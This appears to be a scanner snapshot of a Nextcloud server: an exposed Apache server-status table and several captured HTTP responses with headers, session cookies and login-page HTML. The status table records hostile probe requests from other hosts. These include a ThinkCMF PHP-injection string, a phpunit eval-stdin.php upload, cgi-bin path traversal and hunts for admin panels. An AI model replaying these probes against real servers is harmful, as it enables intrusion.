167.94.145.59http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-5161540/1/18_ 0.031152306040.00.000.14 138.68.157.11http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 2-5161540/0/12_ 0.001152306790.00.000.05 94.189.175.89http/1.1localhost:80GET /phpMyAdmin5/index.php?lang=en HTTP/1.1 2-5161540/0/16_ 0.001152401510.00.000.06 138.68.157.11h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5161540/1/12_ 0.05187422790.00.000.06 167.248.133.61http/1.1localhost:80GET / HTTP/1.1 2-5161540/1/47_ 0.0418943140500.00.003.37 152.89.196.211http/1.1localhost:80GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/ 2-5161540/1/16_ 0.0366530670.00.000.03 203.122.46.146http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 2-5161540/1/17_ 0.03855703970.00.000.14 45.227.254.54http/1.1localhost:80\x03 2-5161540/0/17_ 0.008556037940.00.0013.23 152.89.196.211http/1.1localhost:80GET /solr/admin/info/system?wt=json HTTP/1.1 2-5161540/0/12_ 0.00187401100.00.000.04 167.248.133.61http/1.1 2-5161540/0/15_ 0.00415906410.00.000.23 88.80.189.24http/1.1 2-5161540/0/15_ 0.00115240104740.00.000.02 138.68.157.11http/1.1 2-5161540/0/13_ 0.00187403040.00.000.14 167.248.133.61h2cdone, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5161540/1/14_ 0.06187401380.00.000.05 167.248.133.61http/1.1localhost:80GET /favicon.ico HTTP/1.1 2-5161540/0/14_ 0.00187406340.00.000.10 94.189.175.89http/1.1localhost:80GET /phpmyadmin2/index.php?lang=en HTTP/1.1 2-5161540/1/17_ 0.07120404620.00.000.07 192.241.218.28http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 2-5161540/0/17_ 0.00120404730.00.000.09 94.189.175.89http/1.1localhost:80GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1 2-5161540/0/13_ 0.00104310.00.000.06 161.35.86.181h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5161540/0/18_ 0.00105940.00.000.14 161.35.86.181h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5161540/0/12_ 0.00101790.00.000.04 161.35.86.181http/1.1 2-5161540/0/17_ 0.001321102980.00.000.03 94.189.175.89http/1.1localhost:80GET /administrator/web/index.php?lang=en HTTP/1.1 2-5161540/0/12_ 0.001321104800.00.000.07 94.189.175.89http/1.1localhost:80GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1 2-5161540/0/44_ 0.0013211076000.00.003.37 94.189.175.89http/1.1localhost:80GET /admin/db/index.php?lang=en HTTP/1.1 2-5161540/0/14_ 0.001321108450.00.000.17 94.189.175.89http/1.1localhost:80GET /sql/sqlweb/index.php?lang=en HTTP/1.1 2-5161540/0/10_ 0.0013211063920.00.002.95 94.189.175.89http/1.1localhost:80GET /db/dbadmin/index.php?lang=en HTTP/1.1 2-5161540/0/16_ 0.001321104320.00.000.07 94.189.175.89http/1.1localhost:80GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1 3-5161550/1/14_ 0.0212237530.00.020.10 161.35.86.181h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5161550/0/9_ 0.0010940.00.000.02 161.35.86.181h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5161550/0/12_ 0.00109880.00.000.14 161.35.86.181http/1.1 3-5161550/0/9_ 0.0010730.00.000.02 161.35.86.181http/1.1 3-5161550/1/15_ 0.3812647340.00.020.10 161.35.86.181http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 3-5161550/1/11_ 0.0512076050.00.020.10 192.241.215.205http/1.1 3-5161550/0/14_ 0.001010460.00.000.09 192.241.215.205http/1.1 3-5161550/2/14_ 0.39117780.00.030.15 161.35.86.181http/1.1ravignon.mycloud.paris:443PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 3-5161550/0/12_ 0.001058380.00.0013.20 192.241.215.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5161550/0/13_ 0.00194080.00.000.07 161.35.86.181http/1.1 3-5161550/1/14_ 0.40104950.00.010.19 161.35.86.181http/1.1ravignon.mycloud.paris:443GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e 3-5161550/1/10_ 0.23022480.00.010.07 92.118.39.78http/1.1localhost:80GET / HTTP/1.1 3-5161550/1/12_ 0.4201601840.00.020.08 161.35.86.181http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 3-5161550/2/13_ 0.43042940.00.010.09 161.35.86.181http/1.1ravignon.mycloud.paris:443GET /info.php HTTP/1.1 3-5161550/0/14_ 0.00109230.00.000.09 161.35.86.181http/1.1 3-5161550/1/9_ 0.17102340.00.000.05 161.35.86.181http/1.1 3-5161550/2/15_ 0.4601915460.00.030.07 161.35.86.181http/1.1ravignon.mycloud.paris:443GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-di 3-5161550/1/8_ 0.17002540.00.000.04 192.241.217.162http/1.1localhost:80MGLNDD_109.190.179.92_80\n 3-5161551/0/10W 0.00003100.00.000.06 161.35.86.181http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 3-5161550/0/9_ 0.000070.00.000.01 101.32.97.232http/1.1 3-5161550/0/10_ 0.00007540.00.000.11 138.68.157.11http/1.1 3-5161550/2/12_ 0.4401325230.00.030.08 161.35.86.181http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 3-5161550/1/11_ 0.1401363560.00.020.09 167.248.133.61http/1.1 3-5161550/2/11_ 0.4501245550.00.020.11 161.35.86.181http/1.1ravignon.mycloud.paris:443GET /api/search?folderIds=0 HTTP/1.1 3-5161550/1/10_ 0.17013770.00.000.05 194.55.186.199http/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot SSL/TLS Session Cache Status: cache type: SHMCB, shared memory: 512000 bytes, current entries: 20subcaches: 32, indexes per subcache: 88time left on oldest entries' objects: avg: 298 seconds, (range: 297...299)index usage: 0%, cache usage: 0%total entries stored since starting: 25total entries replaced since starting: 0total entries expired since starting: 5total (pre-expiry) entries scrolled out of the cache: 0total retrieves since starting: 0 hit, 15 misstotal removes since starting: 0 hit, 0 miss Apache/2.4.52 (Ubuntu) Server at 109.190.179.92 Port 443
Open service 109.190.179.92:443
2024-10-31 23:11
HTTP/1.1 400 Bad Request Date: Thu, 31 Oct 2024 23:10:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=lkshSZKfCKBK%2FXtw7CEPscOIKDSJBYpb%2FylJfm%2FTSY%2FzSct0%2BpUCjG61s1sABGYSSYxji9mfi4YVR9RTsTpem5staFg36w2m%2BBrGQP0KEkZngTRRje0bMzufRwX56WEj; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=d2po2ms7904ust1n0jvetju23p; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="EehvCRcSglq0cP0onG3OgaPNmOi97d2/lROkwddcy+Y=:ftFdeyR61xXhAshCqCqH7MGp94aSurjH2mvc8fwuhrU="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="RWVodkNSY1NnbHEwY1Awb25HM09nYVBObU9pOTdkMi9sUk9rd2RkY3krWT06ZnRGZGV5UjYxeFhoQXNoQ3FDcUg3TUdwOTRhU3VyakgybXZjOGZ3dWhyVT0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-10-30 17:01
HTTP/1.1 302 Found Date: Wed, 30 Oct 2024 17:01:50 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-N3RmYk9FWWxQdUJUNE54RkordXlqOCtTa3FDb0o5dUxyeHZZV3Yva1RwOD06bTVTSlhBTkVXNVFEaUsxeVljU0xwS3FnK292WVkrbTU2eTIvZGJhU2V2az0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=1kTfEcnmk1agAfqg8XIP5pbuQmhSGY1jPafNOaV2ZqYEaZRV4o3GRZE2wv3YK1VXUy%2FmXdy3c8FoRqargF%2FxHNWhIz8imtX%2FKVJnPYUzOSQyin2%2Fz9TRxBMI5GdLEZwl; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=t4q4t3idqj928dpd3jgnhqlr8i; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-10-30 00:47
HTTP/1.1 400 Bad Request Date: Wed, 30 Oct 2024 00:47:47 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=UE%2Flr05JBIeXikPn%2B7YajUsPt3VA3xizTePZN0Auz4e9tvaT5bx3QRlqXoRaCSXB3og1TbpZVgydcQjyQm2Y9bVGV2mxlY3OZvcRV1joEV4SsUut1RbOMn15vZwI9%2BF9; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=gau4an3kru07t02q8csonq67ov; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="/wWCGSt4wBsoOoOryISpSj9ZPWpaz9vIz/Z9AhvatyQ=:vFHxbFEUkEpQTO3Au9H7cmU+CCATi7GNlZc7aDS//BY="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="L3dXQ0dTdDR3QnNvT29PcnlJU3BTajlaUFdwYXo5dkl6L1o5QWh2YXR5UT06dkZIeGJGRVVrRXBRVE8zQXU5SDdjbVUrQ0NBVGk3R05sWmM3YURTLy9CWT0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-10-22 05:22
HTTP/1.1 302 Found Date: Tue, 22 Oct 2024 05:22:53 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-OWlMa0JrWUJPdXpoemwrMUpkTXBad3ZOdHhod2hwNytuL1Y3a0ZnOHlHVT06a0Zlb1BuOU9VdDNTcUNtQ1hJcHJMMzZwK2xOSThiR3ExSm9KOWhsbCtCOD0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=aF4LCJ0ItoBuM8ug1TaVLg4TOfFI7d6T5xB6d71wFKAATO0V8j8OiK1X7tU%2FYb8LsExA0UFdl%2B%2BcTdtKXggkZ9FxRrFFXj5GzxtbSJMp2GjLDjguLT3Ob28cvT57IGXG; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=0eo1p77qbht8sv9j3ogv2p0vuo; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-10-21 21:25
HTTP/1.1 400 Bad Request Date: Mon, 21 Oct 2024 21:24:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=%2B6tZEId29qNmJAR0zf%2FVQhI%2FhweFV1o2YB%2BdTjlDyLS676gdHc6TfzhiOrumPLZOyLsoLuFpBz0EDchYOybehkVVj3R2mhsoPdZ3EkQ%2B%2BHSxq2jy62eEHYowqNy3flcd; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=pt1uun08tdi101qs0osq7p0n7a; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="7LbnBTgqgYgIMOpZRohiWOdWcUVj5ceycomrGMQhvUY=:quOoZHNS1OU6B5JrFesvO9UACQMLrvL7EPvkVa1R6h8="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="N0xibkJUZ3FnWWdJTU9wWlJvaGlXT2RXY1VWajVjZXljb21yR01RaHZVWT06cXVPb1pITlMxT1U2QjVKckZlc3ZPOVVBQ1FNTHJ2TDdFUHZrVmExUjZoOD0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
